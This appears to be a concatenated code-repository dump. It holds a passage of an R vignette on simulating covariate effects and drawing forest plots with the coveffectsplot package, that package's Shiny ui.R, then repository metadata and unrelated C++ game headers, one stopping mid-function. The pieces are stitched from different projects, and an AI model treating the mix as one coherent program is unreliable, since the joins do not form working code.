geom_line(data = outcovcomb, aes(group=interaction(ID)),
alpha= 1, size=0.7, colour = "black") +
facet_grid(ALB ~ WT, labeller=label_both) +
labs(
x = "Time (h)",
y = "Plasma Concentrations",
linetype = "No Uncertainty\nSex",
colour = "Uncertainty\nReplicates\nWeight",
caption = "Simulation with Uncertainty\nwithout BSV") +
coord_cartesian(ylim=c(0,3.5))+
guides(colour = guide_legend(override.aes = list(alpha = 1)))
pkprofileuncertainty
```
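As a side note, the `for` loop above grows `iter_sims` by repeated `rbind`, which is easy to read but slow for large `nsim`. An equivalent sketch (using the same objects defined above) collects the replicates in a list and binds them once:
```{r, eval=FALSE}
# Sketch of an alternative to the for loop: bind all replicates in one step.
sim_one_rep <- function(i) {
  data.all <- data.table(idata, data.dose, sim_parameters[i])
  out <- modcovsim %>%
    data_set(data.all) %>%
    zero_re() %>%
    mrgsim(start = 0, end = 24, delta = 0.25) %>%
    as.data.frame %>%
    as.data.table
  out[, rep := i]
  out
}
iter_sims <- data.table::rbindlist(lapply(1:nsim, sim_one_rep))
```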
### Compute PK Parameters and Boxplots
Similar to an earlier section, we compute the PK parameters by patient and by replicate, standardize them by the computed median for the reference subject, and provide a plot. We add some data manipulation to construct more informative labels that will help in the plotting.
```{r, fig.width=7, include=FALSE, message=FALSE}
out.df.univariatecov.nca <- iter_sims[, derive.exposure(time, CP), by=.(rep, ID, WT, SEX, ALB)]
out.df.univariatecov.nca
refvalues <- out.df.univariatecov.nca[
ALB==45 & WT==85 & SEX=="Female",
.(medparam = median(paramvalue)), by=paramname]
data.frame(refvalues)
```
**Median Parameter Values for the Reference:**
```{r, fig.width=7,fig.height=5 ,message=FALSE}
covcomb$covvalue[covcomb$covname=="WT"] <- paste(covcomb$WT[covcomb$covname=="WT"],"kg")
covcomb$covvalue[covcomb$covname=="ALB"] <- paste(covcomb$ALB[covcomb$covname=="ALB"],"g/L")
covcomb$covvalue[covcomb$covname=="SEX"] <- "Male"
covcomb$covvalue[covcomb$covname=="REF"] <- "85 kg\nFemale\n45 g/L"
#covcomb[covname=="REF", covvalue := "85 kg Female 45 g/L"]
covcomb <- as.data.table(covcomb)
out.df.univariatecov.nca <- merge(
out.df.univariatecov.nca,
covcomb[, list(ID, covname, covvalue)]
)
setkey(out.df.univariatecov.nca, paramname)
out.df.univariatecov.nca <- merge(
out.df.univariatecov.nca,
refvalues)
out.df.univariatecov.nca[, paramvaluestd := paramvalue/medparam]
boxplotdat <- out.df.univariatecov.nca[covname!="REF"]
boxplotdat[covname=="WT", covname2 := "Weight"]
boxplotdat[covname=="ALB", covname2 := "Albumin"]
boxplotdat[covname=="SEX", covname2 := "Sex"]
boxplotdatREFWT <- out.df.univariatecov.nca[covname=="REF"]
boxplotdatREFWT[, covname2 := "Weight"]
boxplotdatREFWT[, covvalue := covcomb[covname=="REF", covvalue]]
boxplotdatREFSEX <- out.df.univariatecov.nca[covname=="REF"]
boxplotdatREFSEX[, covname2 := "Sex"]
boxplotdatREFSEX[, covvalue := covcomb[covname=="REF", covvalue]]
boxplotdatREFALB <- out.df.univariatecov.nca[covname=="REF"]
boxplotdatREFALB[, covname2 := "Albumin"]
boxplotdatREFALB[, covvalue := covcomb[covname=="REF", covvalue]]
boxplotdat <- rbind(
boxplotdat,
boxplotdatREFWT,
boxplotdatREFSEX,
boxplotdatREFALB)
boxplotdat[paramname=="AUC", paramname2 := "AUC"]
boxplotdat[paramname=="Clast", paramname2 := "C[last]"]
boxplotdat[paramname=="Cmax", paramname2 := "C[max]"]
boxplotdat[, covname2 := factor(covname2, levels=unique(covname2))]
#boxplotdat[, covvalue := factor(covvalue, levels=unique(covvalue))]
boxplotdat[, covvalue := factor(covvalue,
levels=c("56 kg", "72 kg", "40 g/L", "Male", "85 kg\nFemale\n45 g/L", "98 kg", "128 kg", "50 g/L"))]
pkparametersboxplot<- ggplot(boxplotdat, aes(x=covvalue, y=paramvalue))+
facet_grid(paramname2 ~ covname2, scales="free", labeller=label_parsed,
switch="both") +
geom_boxplot() +
labs(y="Parameter Values") +
theme(axis.title=element_blank(),
strip.placement = "outside")
pkparametersboxplot
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# pkprofileuncertainty <- pkprofileuncertainty +theme_bw(base_size = 13)+
# theme(axis.title.y = element_text(size=15))+
# guides(colour=guide_legend(override.aes = list(alpha=1,size=0.5)),
# linetype=guide_legend(override.aes = list(size=0.5)))+
# coord_cartesian(ylim=c(0,4))
# pkprofileuncertainty
# ggsave("Figure_4_3.png", device="png",type="cairo-png",width= 7, height = 4,dpi=72)
#
# pkparametersboxplot
# ggsave("Figure_4_4.png", device="png",type="cairo-png",width= 7, height = 4,dpi=72)
#
# png("Figure_4_34.png", type="cairo-png",width= 2*7*72, height =5*72)
# egg::ggarrange(pkprofileuncertainty,pkparametersboxplot,nrow=1)
# dev.off()
```
### Alternative View of the Data: Distributions and Intervals
Here we provide an alternative visual summary of the standardized PK parameters, showing the distributions and the quantiles of interest. It isolates each covariate's effects in a separate panel, keeping the reference on its own. It is exactly the same data as in the boxplots. Which visual presentation do you prefer? Which one enables you to more clearly see and compare the covariate effects?
```{r, fig.width=7, fig.height=4 ,message=FALSE}
out.df.univariatecov.nca[covname=="WT", covname2 := "Weight"]
out.df.univariatecov.nca[covname=="ALB", covname2 := "Albumin"]
out.df.univariatecov.nca[covname=="SEX", covname2 := "Sex"]
out.df.univariatecov.nca[covname=="REF", covname2 := "Reference"]
out.df.univariatecov.nca[paramname=="AUC", paramname2 := "AUC"]
out.df.univariatecov.nca[paramname=="Clast", paramname2 := "C[last]"]
out.df.univariatecov.nca[paramname=="Cmax", paramname2 := "C[max]"]
out.df.univariatecov.nca[, covvalue := factor(covvalue, levels=unique(covvalue))]
out.df.univariatecov.nca[, covname2 := factor(covname2, levels=unique(covname2))]
out.df.univariatecov.nca[, paramname2 := factor(paramname2, levels=unique(paramname2))]
ggplot(out.df.univariatecov.nca, aes(
x = paramvaluestd,
y = covvalue,
fill = factor(..quantile..),
height = ..ndensity..)) +
facet_grid(covname2 ~ paramname2,
scales = "free_y",
space = "free",
labeller = label_parsed)+
annotate("rect",
xmin = 0.8,
xmax = 1.25,
ymin = -Inf,
ymax = Inf,
fill = "gray",
alpha = 0.4) +
stat_density_ridges(
geom = "density_ridges_gradient",
calc_ecdf = TRUE,
quantile_lines = TRUE,
rel_min_height = 0.001,
scale = 0.9,
quantiles = c(0.05,0.5, 0.95)) +
  scale_x_continuous(
    breaks = c(0.25, 0.5, 0.8, 1/0.8, 1/0.5, 1/0.25),
    trans = "log") +
scale_fill_manual(
name = "Probability",
values = c("white", "#0000FFA0", "#0000FFA0", "white"),
labels = c("(0, 0.05]", "(0.05, 0.5]","(0.5, 0.95]", "(0.95, 1]")) +
geom_vline(aes(xintercept=1), size=1) +
theme_bw() +
  labs(x="Effects Relative to Parameter Reference Value", y="")
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# last_plot()+theme(legend.position="none")
# ggsave("Figure_4_5.png", device="png",type="cairo-png",
# width= 7, height = 4,dpi=72)
```
### Adding the BSV and Using `forest_plot`
To contrast the covariate effects with the random unexplained variability, we add to the data the BSV intervals computed in an earlier section. We then do some data manipulation and formatting to produce a plot with the package function `forest_plot`. To simplify, we will only keep AUC before revisiting plots with more than one parameter at the end.
```{r, fig.width=7, fig.height=6}
fpdata <- out.df.univariatecov.nca[,
setNames(as.list(quantile(paramvaluestd, probs=c(0.5, 0.05, 0.95))), c("mid", "lower", "upper")),
by=.(paramname2, covname2, covvalue)]
bsvranges[paramname=="AUC", paramname2 := "AUC"]
bsvranges[paramname=="Clast", paramname2 := "C[last]"]
bsvranges[paramname=="Cmax", paramname2 := "C[max]"]
setkey(bsvranges, paramname2)
fpdataBSV50 <- fpdata[covname2 == "Reference"]
fpdataBSV50$covname2 <- "BSV"
fpdataBSV50$covvalue <- "50% of patients"
setkey(fpdataBSV50, paramname2)
fpdataBSV50$lower <- bsvranges[,"P25"]
fpdataBSV50$upper <- bsvranges[,"P75"]
fpdataBSV90 <- fpdata[covname2 == "Reference"]
fpdataBSV90$covname2 <- "BSV"
fpdataBSV90$covvalue <- "90% of patients"
setkey(fpdataBSV90, paramname2)
fpdataBSV90$lower <- bsvranges[,"P05"]
fpdataBSV90$upper <- bsvranges[,"P95"]
fpdata <- rbind(fpdata, fpdataBSV90, fpdataBSV50)
fpdata[, LABEL := sprintf("%s [%s, %s]",
round_pad(mid, 2),
round_pad(lower, 2),
round_pad(upper, 2)) ]
setnames(fpdata, "paramname2", "paramname")
setnames(fpdata, "covname2", "covname")
setnames(fpdata, "covvalue", "label")
fpdata[, label := factor(label, levels=unique(label))]
interval_legend_text <- "Median (points)\n90% CI (horizontal lines)"
interval_bsv_text <- "BSV (points)\nPrediction Intervals (horizontal lines)"
ref_legend_text <- "Reference (vertical line)\nClinically relevant limits\n(gray area)"
area_legend_text <- "Reference (vertical line)\nClinically relevant limits\n(gray area)"
png("./coveffectsplot3.png",width =9 ,height = 6,units = "in",res=72)
coveffectsplot::forest_plot(fpdata[paramname=="AUC"],
ref_area = c(0.8, 1/0.8),
x_range = c(0.5, 2),
strip_placement = "inside",
base_size = 18,
y_label_text_size = 12,
xlabel = "Fold Change Relative to Reference",
ref_legend_text = ref_legend_text,
area_legend_text = area_legend_text,
interval_legend_text = interval_legend_text,
interval_bsv_text = interval_bsv_text,
facet_formula = "covname ~ paramname",
facet_switch = "y",
facet_scales = "free_y",
facet_space = "free",
paramname_shape = FALSE,
table_position = "right",
table_text_size = 4,
plot_table_ratio = 3,
show_table_facet_strip = "none",
logxscale = TRUE,
major_x_ticks = c(0.5, 0.8, 1/0.8, 1/0.5),
return_list = FALSE)
dev.off()
```

## Customization of the Plots
In this section, we first show a `forest_plot` built-in theme, then how to get the ggplots as a list for further editing with ggplot code.
### Using `theme_benrich` with Additional Options
This is achieved by setting `theme_benrich = TRUE` and specifying that you want no legend with
`legend_position = "none"`. With this theme active, you can also control the table title text and size via the `table_title` and `table_title_size` arguments.
```{r,message=FALSE,fig.width=7}
png("./coveffectsplot4.png",width =9 ,height = 6,units = "in",res=72)
coveffectsplot::forest_plot(fpdata[paramname=="AUC"],
ref_area = c(0.8, 1/0.8),
x_range = c(0.5,2),
xlabel = "Fold Change Relative to Reference",
x_label_text_size= 10,
facet_formula = "covname~paramname",
theme_benrich = TRUE,
table_title_size = 15,
table_title = "Median [90% CI]",
interval_legend_text = interval_legend_text,
interval_bsv_text = interval_bsv_text,
legend_position = "none",
strip_placement = "outside",
base_size = 12,
facet_switch = "y",
facet_scales = "free_y",
facet_space = "free",
paramname_shape = FALSE,
table_position = "right",
table_text_size=4,
plot_table_ratio = 3,
show_table_facet_strip = "none",
logxscale = TRUE,
major_x_ticks = c(0.25,0.5,0.8,1/0.8,1/0.5,1/0.25),
return_list = FALSE)
dev.off()
```

### Returning a List of ggplots
You can get the underlying ggplots as a list for further editing by setting `return_list = TRUE` and saving the result into an object. The list will contain two objects: the first is the main plot and the second is the table. We illustrate how you can modify the look of the plots using regular ggplot code that changes the facet text color to gray italic. Finally, we recombine the plots using `egg::ggarrange`.
```{r,message=FALSE,fig.width=7}
png("./coveffectsplot0.png",width =9 ,height = 6,units = "in",res=72)
plotlists <- coveffectsplot::forest_plot(fpdata[paramname=="AUC"],
ref_area = c(0.8, 1/0.8),
xlabel = "Fold Change Relative to Reference",
ref_legend_text = "Reference (vertical line)\nClinically relevant limits\n(gray area)",
area_legend_text = "Reference (vertical line)\nClinically relevant limits\n(gray area)",
interval_legend_text = interval_legend_text,
interval_bsv_text = interval_bsv_text,
facet_formula = "covname~paramname",
facet_switch = "y",
facet_scales = "free_y",
facet_space = "free",
paramname_shape = FALSE,
table_position = "right",
table_text_size=4,
plot_table_ratio = 4,
show_table_facet_strip = "none",
logxscale = TRUE,
major_x_ticks = c(0.25,0.5,0.8,1/0.8,1/0.5,1/0.25),
return_list = TRUE)
plotlists
dev.off()
```
```{r, fig.width=7, fig.height=6, warning=FALSE,message=FALSE}
main_plot <- plotlists[[1]] + theme(
panel.spacing=unit(10, "pt"),
panel.grid=element_blank(),
panel.grid.minor=element_blank(),
legend.position="bottom",
strip.placement.y="outside",
strip.background.y=element_blank(),
strip.text.y=element_text(
hjust=1,
vjust=1,
face="italic",color="gray",
size=rel(1)),
legend.text = element_text(size=rel(0.5)),
plot.margin = margin(t=0,r=0,b=0,l=5,unit="pt")) +
scale_y_discrete(
breaks=c("90% of patients",
"50% of patients",
"85 kg\nFemale\n45 g/L",
"40 g/L","50 g/L","Male",
"56 kg","72 kg","98 kg","128 kg"
),
labels=c("90% of patients",
"50% of patients",
"85 kg-Female-45 g/L",
"40 g/L","50 g/L","Male",
"56 kg","72 kg","98 kg","128 kg"
)
)
table_plot <- plotlists[[2]] + theme(
panel.border=element_blank(),
panel.spacing=unit(10, "pt"),
strip.background.y=element_blank(),
legend.text = element_text(size=rel(0.5)),
plot.margin = margin(t=0,r=5,b=0,l=0,unit="pt"))
png("./coveffectsplot5.png",width =8.5 ,height = 6,units = "in",res=72)
egg::ggarrange(
main_plot,
table_plot,
nrow = 1,
widths = c(3, 1)
)
dev.off()
```

### Launch the Shiny App for Point and Click Editing
Alternatively, you can launch the app by typing `run_interactiveforestplot(yourdataname)` for point-and-click editing. This will help you quickly generate the plot you want.
```{r ,echo=FALSE}
# uncomment in interactive mode
# run_interactiveforestplot(fpdata)
```
## Plots with Multiple PK Parameters
You can also have plots with more than one PK parameter. You may want to facet by parameter, or to use a different shape for each parameter.
### Facet by Parameter
This is achieved by setting `paramname_shape = FALSE` and `facet_formula = "covname~paramname"`. We also suppress the table by using `table_position = "none"` and reduce the plot text sizes using `base_size = 11`.
```{r, fig.width=7, fig.height=6,message=FALSE}
png("./coveffectsplot6.png",width =9.5 ,height = 6,units = "in",res=72)
forest_plot(fpdata,
ref_area = c(0.8, 1/0.8),
x_range = c(0.5,2),
xlabel = "Fold Change Relative to Reference",
facet_formula = "covname~paramname",
interval_legend_text = interval_legend_text,
interval_bsv_text = interval_bsv_text,
facet_switch = "y",
facet_scales = "free_y",
facet_space = "free",
facet_labeller = label_parsed,
paramname_shape = FALSE,
table_position = "none",
table_text_size=4,
base_size = 11,
plot_table_ratio = 4,
show_table_facet_strip = "none",
logxscale = TRUE,
major_x_ticks = c(0.5,0.8,1/0.8,1/0.5),
x_label_text_size = 10,
return_list = FALSE)
dev.off()
```

### Shape by Parameter
This is achieved by setting `paramname_shape = TRUE`. We also illustrate how you can use `legend_order` to choose the legend ordering, along with a few other options.
```{r, fig.width=7, fig.height=6,message=FALSE}
png("./coveffectsplot7.png",width =9.5 ,height = 6,units = "in",res=72)
forest_plot(fpdata[paramname!="AUC"],
ref_area = c(0.8, 1/0.8),
x_range = c(0.35,1/0.35),
xlabel = "Fold Change Relative to Reference",
ref_legend_text = "Reference\nClinically relevant limits\n(0.8-1.25)",
area_legend_text = "Reference\nClinically relevant limits\n(0.8-1.25)",
interval_legend_text = "Median\n90% CI",
interval_bsv_text = "BSV\nPrediction Intervals",
facet_formula = "covname~.",
paramname_shape = TRUE,
legend_order =c("shape","pointinterval","ref", "area"),
legend_shape_reverse = TRUE,
bsv_col = scales::muted("red"),
interval_col = scales::muted("blue"),
facet_switch = "y",
facet_scales = "free_y",
facet_space = "free",
table_position = "none",
table_text_size=4,
base_size = 9,
plot_table_ratio = 4,
show_table_facet_strip = "none",
logxscale = TRUE,
major_x_ticks = c(0.5,0.8,1/0.8,1/0.5),
legend_space_x_mult = 0.01,
legend_position = "right",
return_list = FALSE)
dev.off()
```

We leave it up to the reader to edit the plot above to `parse` the labels of the shape legend to get subscripts.
While we covered varying one covariate value at a time (marginal effects), we can use an observed or simulated distribution of correlated covariates and simulate joint covariate effects, as illustrated in the PK Model in Pediatric Patients vignette.
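As a minimal sketch of that idea (the log-scale standard deviations and the 0.3 correlation below are illustrative assumptions, not fitted values), correlated weight/albumin vectors could be drawn and passed to the same simulation code used earlier:
```{r, eval=FALSE}
# Illustrative joint draw of WT and ALB (assumed log-normal marginals, correlation 0.3).
set.seed(678549)
logmeans <- log(c(WT = 85, ALB = 45))
logsd    <- c(0.2, 0.1)
R        <- matrix(c(1, 0.3, 0.3, 1), nrow = 2)
Sigma    <- diag(logsd) %*% R %*% diag(logsd)
jointcov <- as.data.table(exp(MASS::mvrnorm(nbsvsubjects, logmeans, Sigma)))
head(jointcov)
```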
<file_sep>/inst/shiny/ui.R
inline_ui <- function(tag) {
div(style = "display: inline-block", tag)
}
fluidPage(
useShinyjs(),
titlePanel(paste0("coveffectsplot: ",utils::packageVersion("coveffectsplot"))),
fluidRow(
column(
2,
tabsetPanel(
tabPanel(
"Inputs",
br(),
tags$div(
tags$strong("Choose csv file to upload"),
"or", actionLink("sample_data_btn", "use sample data")
),
fileInput("datafile", NULL,
multiple = FALSE, accept = c("csv")),
shinyjs::hidden(
selectizeInput(
'exposurevariables',
label = "Parameter(s)",
choices = c(),
multiple = TRUE,
options = list(plugins = list('remove_button', 'drag_drop')),
width = '800px'
),
checkboxInput('shapebyparamname', 'Change Symbol by Parameter(s) ?', value = TRUE),
sliderInput("vdodgeheight", "Vertical Space Between Parameters(s)",
min=0.5, max=2, value=0.8,width = '800px'),
selectizeInput(
"covariates",
"Covariates Top to Bottom (Remove/Drag and Drop to Desired Order):",
choices = c(),
multiple = TRUE,
options = list(
placeholder = 'Please select one or more variables',
plugins = list('remove_button', 'drag_drop')
),
width = '800px'
),
selectizeInput(
'covvalueorder',
label = paste("Drag and Drop to Desired Order within facets", "values"),
choices = c(),
multiple = TRUE,
options = list(plugins = list('remove_button', 'drag_drop')),
width = '800px'
)
)
), # tabPanel
tabPanel("Facets",
selectInput( "facetformula", "Facet Formula:",
choices = c("covname ~ .","covname~paramname"),
selected = c("covname ~ ."),
multiple = FALSE),
tabsetPanel(
tabPanel("Size/Angle/Face",
sliderInput("facettexty", "Facet Text Size Y",
min = 0, max = 32, step = 1, value = 22),
sliderInput("facettextx", "Facet Text Size X",
min = 0, max = 32, step = 1, value = 22),
sliderInput("facettextyangle", "Facet Text Angle Y",
min = 0, max = 180+90, step = 90, value = 0),
sliderInput("facettextxangle", "Facet Text Angle X",
min = 0, max = 90, step = 90, value = 0),
checkboxInput('boldfacettext', "Bold Facet Text", value = TRUE)
),
tabPanel("Justification",
sliderInput("x_facet_text_vjust", "Facet Text Vertical Justification X",
min = 0, max = 1, step = 0.1, value = 0.5),
sliderInput("y_facet_text_vjust", "Facet Text Vertical Justification Y",
min = 0, max = 1, step = 0.1, value = 0.5),
sliderInput("x_facet_text_hjust", "Facet Text Horizontal Justification X",
min = 0, max = 1, step = 0.1, value = 0.5),
sliderInput("y_facet_text_hjust", "Facet Text Horizontal Justification y",
min = 0, max = 1, step = 0.1, value = 0.5)
)
),
selectizeInput( "stripplacement", "Strip Placement:",
choices = c("inside","outside"),
selected = c("outside"),
options = list( maxItems = 1 ) ),
selectInput( "facetswitch", "Facet Switch to Near Axis:",
choices = c("both","y","x","none"),
selected = c("both"),
multiple = FALSE),
selectInput( "facetscales", "Facet Scales:",
choices = c("free_y","fixed","free_x","free"),
selected = c("free_y"),
multiple = FALSE),
selectInput('facetspace' ,'Facet Spaces:',
c("fixed","free_x","free_y","free") )
),
tabPanel(
"X/Y Axes",
sliderInput("ylablesize", "Y axis labels size", min=1, max=32, value=24,step=0.5),
sliderInput("xlablesize", "X axis labels size", min=1, max=32, value=24,step=0.5),
checkboxInput('showyaxisgridlines', "Keep Y axis Gridlines", value = TRUE),
checkboxInput('showxaxisgridlines', "Keep X axis Gridlines", value = TRUE),
checkboxInput('customxticks', 'Custom X axis Ticks ?', value = FALSE),
conditionalPanel(
condition = "input.customxticks" ,
textInput("xaxisbreaks",label ="X axis major Breaks",
value = as.character(paste(
0,0.25,0.5,0.8,1,1.25,1.5,1.75,2
,sep=",") )
),
textInput("xaxisminorbreaks",label ="X axis minor Breaks",
value = as.character(paste(
0.75,1.333
,sep=",") )
),
hr()
),
checkboxInput('userxzoom', 'Custom X axis Range ?', value = FALSE),
conditionalPanel(
condition = "input.userxzoom" ,
numericInput("lowerxin",label = "Lower X Limit",value = 0.01,min=NA,max=NA,width='100%'),
numericInput("upperxin",label = "Upper X Limit",value = 2,min=NA,max=NA,width='100%')
),
checkboxInput('logxscale', 'Log-scale X axis ?', value = FALSE),
textInput("yaxistitle", label = "Y axis Title", value = ""),
checkboxInput('parseyaxistitle', 'Parse Y axis Title?', value = FALSE),
textInput("xaxistitle", label = "X axis Title", value = ""),
checkboxInput('parsexaxistitle', 'Parse X axis Title?', value = FALSE)
),
tabPanel(
"How To",
hr(),
includeMarkdown(file.path("text", "howto.md"))
) # tabpanel
) # tabsetPanel
), # column3
column(
8,
plotOutput('plot', height = "auto", width = "100%"),
shinyjs::hidden(
actionButton("get_code", "Show Code", icon = icon("code")), br(), br()
)
), # column6
column(
2,
tabsetPanel(
tabPanel(
"Table Options",
numericInput("sigdigits",label = "Significant Digits",value = 2,min=0,max=NA),
sliderInput("tabletextsize", "Table Text Size", min=1, max=12,step=0.5, value=7),
sliderInput("plottotableratio", "Plot to Table Ratio", min=1, max=5,
value=4,step=0.25,
animate = FALSE),
selectInput('tableposition','Table Position:',
c("on the right" = "right", "below" = "below", "none" = "none") ),
selectInput( "showtablefacetstrips", "Show Table Facet Strip on:",
choices = c("none","both","y","x"),
selected = c("none"),
multiple = FALSE),
selectInput( "tablefacetswitch", "Table Facet Switch to Near Axis:",
choices = c("both","y","x","none"),
selected = c("both"),
multiple = FALSE),
checkboxInput('showtableyaxisticklabel',
'Show Table y axis ticks/labels ?', value = FALSE),
checkboxInput('reservetablexaxislabelspace', 'Reserve Table x axis space ?',
value = FALSE),
checkboxInput('tablepanelborder',
'Draw Table Panel Borders ?',
value = TRUE)
),#tabpanel
tabPanel(
"Reference Options",
checkboxInput('showrefvalue', 'Show Reference Line?', value = TRUE),
conditionalPanel(condition = "input.showrefvalue" ,
numericInput("refvalue","Reference Line",value = 1,step = 0.1)),
checkboxInput('showrefarea', 'Show Reference Area?', value = TRUE),
conditionalPanel(condition = "input.showrefarea" ,
uiOutput("refarea")),
colourpicker::colourInput("fillrefarea",
"Reference Area Fill:",
value= "#BEBEBE50",
showColour = "both",allowTransparent=TRUE,
returnName = TRUE),
div( actionButton("fillrefareareset", "Reset Reference Area Fill"),
style="text-align: right"),
colourpicker::colourInput("colorrefvalue",
"Reference Line Color:",
value= "black",
showColour = "both",allowTransparent=TRUE,
returnName = TRUE),
div( actionButton("colorrefvaluereset", "Reset Reference Line Color"),
style="text-align: right")
),#tabpanel
tabPanel(
"Colour/Legend Options/Theme",
colourpicker::colourInput("stripbackgroundfill",
"Strip Background Fill:",
value="#E5E5E5",
showColour = "both",allowTransparent=TRUE, returnName = TRUE),
div( actionButton("stripbackfillreset", "Reset Strip Background Fill"),
style="text-align: right"),
checkboxInput('removestrip', "Show Strip Background",value = TRUE),
colourpicker::colourInput("colourpointrange",
"Point Range Colour:",
value="blue",
showColour = "both",allowTransparent=TRUE, returnName = TRUE),
div( actionButton("colourpointrangereset", "Reset Point Range Colour"),
style="text-align: right"),
colourpicker::colourInput("colourbsvrange",
"BSV Range Colour:",
value="red",
showColour = "both",allowTransparent=TRUE, returnName = TRUE),
div( actionButton("colourbsvrangereset", "Reset BSV Range Colour"),
style="text-align: right"),
sliderInput("base_size", "Base size for the theme",
min = 1, max = 30, step = 0.1, value = 22),
sliderInput("height", "Plot Height", min=1080/4, max=1080,
value=900, animate = FALSE),
checkboxInput('theme_benrich', "Apply Ben's Theme",value = FALSE),
conditionalPanel(
condition = "input.theme_benrich",
textInput("custom_table_title", label ="Table Title",
value="Median [95% CI]"),
sliderInput("table_title_size", "Size for Table Title",
min = 1, max = 30, step = 0.1, value = 15)
) ,
selectizeInput(
'legendposition',
label = "Legend Position",
choices = c("top","bottom","right","none"),
selected = c("top"),
multiple=FALSE)
),#tabpanel
tabPanel(
"Custom Legend Ordering/Spacing",
inline_ui(
numericInput("ncolinterval",label = "Number of columns for the Interval legend",
value = 1,min=NA,max=NA,width='120px')),
inline_ui(
numericInput("ncolshape",label = "Number of columns for the shape legend",
value = 1,min=NA,max=NA,width='120px')),
selectizeInput(
'legendordering',
label = paste("Drag/Drop to reorder","Colour, Ref, Area Legends"),
choices = c("pointinterval","ref","area","shape"),
selected = c("pointinterval","ref","area","shape"),
multiple=TRUE, options = list(
plugins = list('drag_drop')
)),
checkboxInput('legendshapereverse',
'Reverse the order of shape legend items ?',value = TRUE),
sliderInput("legendspacex", "Multiplier for Space between Legends",
min = 0, max = 1.5, step = 0.1, value = 1),
numericInput("panelspacing",label = "Strip Panel Spacing",
value = 5.5,min=0,step=0.1,
max=20,width='100%'),
inline_ui(
numericInput("margintop",label = "Plot Top Margin",
value = 0,min=0,max=NA,width='80px')),
inline_ui(
numericInput("tabletop",label = "Table Top Margin",
value = 0,min=0,max=NA,width='80px')),
inline_ui(
numericInput("legendtop",label = "Legend Top Margin",
value = 0,min=0,max=NA,width='80px')),
inline_ui(
numericInput("marginleft",label = "Plot Left Margin",
value = 5.5,min=0,max=NA,width='80px')),
inline_ui(
numericInput("tableleft",label = "Table Left Margin",
value = 5.5,min=0,max=NA,width='80px')),
inline_ui(
numericInput("legendleft",label = "Legend Left Margin",
value = 5.5,min=0,max=NA,width='80px')),
inline_ui(
numericInput("marginright",label = "Plot Right Margin",
value = 5.5,min=0,max=NA,width='80px')),
inline_ui(
numericInput("tableright",label = "Table Right Margin",
value = 5.5,min=0,max=NA,width='80px')),
inline_ui(
numericInput("legendright",label = "Legend Right Margin",
value = 5.5,min=0,max=NA,width='80px')),
inline_ui(
numericInput("marginbottom",label = "Plot Bottom Margin",
value = 0,min=0,max=NA,width='80px')),
inline_ui(
numericInput("tablebottom",label = "Table Bottom Margin",
value = 0,min=0,max=NA,width='80px')),
inline_ui(
numericInput("legendbottom",label = "Legend Bottom Margin",
value = 0,min=0,max=NA,width='80px'))
),#tabpanel
tabPanel(
"Custom Legend Text",
textInput("customcolourtitle", label ="Pointinterval Legend text",
value="Median (points)\\n95% CI (horizontal lines)"),
textInput("custombsvtitle", label ="BSV Legend text",
value="BSV (points)\\nPrediction Intervals (horizontal lines)"),
textInput("customlinetypetitle", label ="Ref Legend text",
value="Reference (vertical line)\\nClinically relevant limits (colored area)"),
textInput("customfilltitle", label ="Area Legend text",
value="Reference (vertical line)\\nClinically relevant limits (colored area)"),
checkboxInput('combineareareflegend',
'Combine Ref and Area Legends if they share the same text ?',value = TRUE)
)#tabpanel
) # tabsetpanel
) # closes the column 3
)# fluidrow
)#fluidpage
|
28b9fa418414a76f171cfb51896141730834df78
|
[
"Markdown",
"R",
"RMarkdown"
] | 17
|
Markdown
|
smouksassi/interactiveforestplot
|
3a67629d13d29a16ad94f94cacacae5bfada7eef
|
4346dcde123cd4599c0baa6ccd07ca89a3b29e07
|
refs/heads/master
|
<file_sep>#ifndef BATTLEFIELD_PROVIDER_H
#define BATTLEFIELD_PROVIDER_H
#include <map>
#include <unordered_map>
#include <vector>
#include "CommonDefinitions.h"
#include "tinyxml2.h"
class BattleField;
class BattleFieldFactory;
class MegamanData;
/* Persistent object that provides an appropriate battlefield map each time it is called */
class BattlefieldProvider {
public:
BattlefieldProvider(std::string standardBackground, std::string standardMusic);
bool initializeMaps(const std::string& mapsFilename);
BattleField* getBattlefield(Area area, MegamanData* data, int minimalTier = 0);
private:
std::string previousID;
tinyxml2::XMLDocument mapDocument;
tinyxml2::XMLNode* mapRoot;
std::string standardBackground;
std::string standardMusic;
tinyxml2::XMLElement* chooseBattlefield(Area area, int minimalTier) const;
int gatherTotalWeightOfMaps(tinyxml2::XMLElement* map, int minimalTier) const;
tinyxml2::XMLElement* findArea(Area area) const;
BattleField* parseBattlefield(tinyxml2::XMLElement* map);
void parseRow(tinyxml2::XMLElement* row, RowPosition rowPosition, BattleFieldFactory& factory) const;
void placeObjectsOnBattlefield(BattleField* battlefield, MegamanData* data, tinyxml2::XMLElement* objectNode) const;
};
#endif<file_sep>#ifndef SCRIPT_INTERFACE_H
#define SCRIPT_INTERFACE_H
#include <iostream>
#include <string>
#include "luaHeader.h"
/* Maintains a lua state which contains tables with parameters */
class ScriptInterface {
public:
ScriptInterface();
bool addScript(const std::string& scriptName);
void update();
template<class T>
T retrieveParameter(const std::string& tableName, const std::string& entryName, const std::string& parameter);
private:
lua_State* state;
std::vector<std::string> scriptNames;
luabind::object retrieveObject(const std::string& tableName, const std::string& entryName, const std::string& parameter);
};
template<class T>
T ScriptInterface::retrieveParameter(const std::string& tableName, const std::string& entryName, const std::string& parameter) {
return luabind::object_cast<T>(retrieveObject(tableName, entryName, parameter));
}
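// Example usage (hypothetical table defined in a previously added lua script):
//   -- enemies.lua: enemies = { mettaur = { hp = 40 } }
//   int hp = scripts.retrieveParameter<int>("enemies", "mettaur", "hp");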
#endif
<file_sep>#include "ScriptInterface.h"
#include "cocos2d.h"
ScriptInterface::ScriptInterface() {
state = luaL_newstate();
}
bool ScriptInterface::addScript(const std::string& scriptName) {
if (luaL_dofile(state, scriptName.c_str()) == 0) {
scriptNames.push_back(scriptName);
return true;
}
std::string errorMessage = "Script with filename " + scriptName + " is not a valid lua file or does not exist\n";
cocos2d::log(errorMessage.c_str());
return false;
}
void ScriptInterface::update() {
for (const auto& script : scriptNames) {
luaL_dofile(state, script.c_str());
}
}
luabind::object ScriptInterface::retrieveObject(const std::string& tableName, const std::string& entryName, const std::string& parameter) {
luabind::object table = luabind::globals(state)[tableName];
if (luabind::type(table) == LUA_TTABLE) {
luabind::object entry = table[entryName];
if (luabind::type(entry) == LUA_TTABLE) {
return entry[parameter];
}
}
